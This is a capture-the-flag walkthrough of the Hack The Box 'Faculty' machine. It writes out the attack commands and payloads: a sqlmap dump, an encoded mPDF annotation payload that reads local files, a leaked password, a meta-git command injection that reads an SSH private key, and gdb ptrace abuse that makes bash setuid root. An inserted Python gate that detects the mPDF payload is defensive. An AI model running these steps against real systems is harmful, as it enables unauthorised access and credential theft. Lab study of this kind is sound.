Faculty - HTB - Key Points
October 25, 2022•464 words
Target's IP: 10.10.11.169
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
The JavaScript on the login page suggests that, if you intercept the response and change the 3 to a 1, you can bypass the login.
sqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dump
Administrator | 1 | 1fecbe762af147c1176a0fc2c722a345 | admin
Generating PDFs as an authenticated user, you can see that the files are created with mPDF, a library that is subject to an LFI vulnerability:
<h1>ciao</h1><annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
which, once properly encoded, must be supplied as follows:
JTI1M0NoMSUyNTNFY2lhbyUyNTNDL2gxJTI1M0UlMjUzQ2Fubm90YXRpb24lMjUyMGZpbGU9JTI1MjIvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBjb250ZW50PSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwaWNvbj0lMjUyMkdyYXBoJTI1MjIlMjUyMHRpdGxlPSUyNTIyQXR0YWNoZWQlMjUyMEZpbGU6JTI1MjAvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBwb3MteD0lMjUyMjE5NSUyNTIyJTI1MjAvJTI1M0U=
gbyolo:x:1000:1000:gbyolo:/home/gbyolo:/bin/bash
developer:x:1001:1002:,,,:/home/developer:/bin/bash
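A server-side gate for this class of input, added here as an example that is not part of the original write-up and not mPDF's own code: it reverses the encoding seen in the payload above (the HTML is URL-encoded twice and then base64-encoded) and refuses any request whose decoded HTML carries an annotation tag with a file attribute. The benign sample and the idea of checking the raw parameter before it reaches mPDF are assumptions.

```python
import base64
import re
from typing import List
from urllib.parse import unquote

# An mPDF <annotation> tag whose file="..." attribute names a path is what
# turns a PDF export into a local file read; capture that path.
ANNOTATION_RE = re.compile(
    r'<annotation\b[^>]*?\bfile\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE
)

# The encoded payload exactly as shown in the write-up above.
SAMPLE_PAYLOAD = (
    "JTI1M0NoMSUyNTNFY2lhbyUyNTNDL2gxJTI1M0UlMjUzQ2Fubm90YXRpb24lMjUyMGZpbGU9"
    "JTI1MjIvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBjb250ZW50PSUyNTIyL2V0Yy9wYXNzd2QlMjUy"
    "MiUyNTIwaWNvbj0lMjUyMkdyYXBoJTI1MjIlMjUyMHRpdGxlPSUyNTIyQXR0YWNoZWQlMjUy"
    "MEZpbGU6JTI1MjAvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBwb3MteD0lMjUyMjE5NSUyNTIyJTI1"
    "MjAvJTI1M0U="
)

# Constructed benign input: plain HTML with no percent-encoding. unquote()
# leaves text without % sequences unchanged, so the same decoder handles it.
BENIGN_PAYLOAD = base64.b64encode(b"<h1>Schedule</h1>").decode()


def decode_pdf_payload(blob: str) -> str:
    """Reverse the encoding seen in the write-up: base64 over doubly
    URL-encoded HTML. Raises ValueError when the blob is not base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        raise ValueError("payload is not valid base64") from exc
    # Two rounds of percent-decoding undo the double URL-encoding.
    return unquote(unquote(raw.decode("utf-8", errors="replace")))


def find_file_annotations(blob: str) -> List[str]:
    """Return every path an <annotation file=...> tag tries to attach."""
    return ANNOTATION_RE.findall(decode_pdf_payload(blob))


def is_safe_pdf_request(blob: str) -> bool:
    """Gate to run before the HTML reaches mPDF: refuse undecodable input
    and anything that attaches a file; ordinary markup passes."""
    try:
        return not find_file_annotations(blob)
    except ValueError:
        return False


if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_PAYLOAD), ("benign", BENIGN_PAYLOAD)):
        verdict = "safe" if is_safe_pdf_request(blob) else "blocked"
        print(name, verdict, find_file_annotations(blob) if verdict != "safe" else "")
```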
Using the same exploit to read the PHP files of the web server, we find that the file used to connect to the database contains a password:
Co.met06aci.dly53ro.per
It turns out to be gbyolo's password, so we can log into the box over SSH.
gbyolo can run meta-git as the developer user via sudo. A quick search turns up an easy exploit that gives us command execution as developer, like this:
sudo -u developer /usr/local/bin/meta-git clone 'tmp||cat /home/developer/.ssh/id_rsa'
developer@faculty:~$ cat user.txt
0b...8a
Checking binary capabilities, gdb has the cap_sys_ptrace capability, which allows us to attach to processes running as root. There is a Python process running as root; if we attach to it, we can call system() from the debugger and execute commands as root.
(gdb) call (void)system("ls")
[Detaching after vfork from child process 62096]
(gdb) call (void)system("chmod +s /bin/bash")
[Detaching after vfork from child process 62111]
(gdb) quit
A debugging session is active.
Inferior 1 [process 725] will be detached.
Quit anyway? (y or n) y
Detaching from program: /usr/bin/python3.8, process 725
[Inferior 1 (process 725) detached]
developer@faculty:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
developer@faculty:~$ /bin/bash -p
bash-5.0# cd /root
bash-5.0# cat root.txt
7b...6e
Merry hacking ;)